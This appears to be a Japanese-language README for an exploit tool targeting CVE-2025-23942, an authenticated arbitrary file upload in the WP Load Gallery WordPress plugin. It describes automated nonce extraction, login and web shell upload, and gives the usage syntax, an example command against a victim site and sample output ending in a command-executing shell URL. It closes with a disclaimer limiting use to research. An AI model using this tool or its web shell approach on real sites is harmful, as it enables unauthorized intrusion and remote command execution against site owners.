
WP Load Gallery <= 2.1.6 - 認証済み (Author+) 任意のファイルアップロード
NgocCode WP Load Gallery における危険なタイプのファイルアップロード制限不備の脆弱性により、WebサーバーへのWeb Shellのアップロードが可能になります。この問題はWP Load Gallery:n/a から 2.1.6 までに影響します。
✅ 自動エクスプロイト – nonceを抽出し、ログイン後、シェルを自動的にアップロードします。
✅ バージョンチェック – エクスプロイト前にターゲットが脆弱かどうかを確認します。
✅ エラーハンドリング – 障害が発生してもスムーズに実行できるようにします。
✅ セッション管理 – 認証に持続的なセッション管理を使用します。
✅ リアルタイムフィードバック – 各ステップで出力を提供します。
requests モジュール(pip install requests)必要なパラメータを指定してスクリプトを実行します:
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit WP Load Gallery - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress Username
-p PASSWORD, --password PASSWORD
WordPress Password
例:
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
このエクスプロイトは教育およびセキュリティ研究目的のみを対象としています。自分が所有していない、またはテストする明示的な許可を得ていないシステムで使用しないでください。作者はこのスクリプトの誤用について一切の責任を負いません。 ( Khaled_alenazi )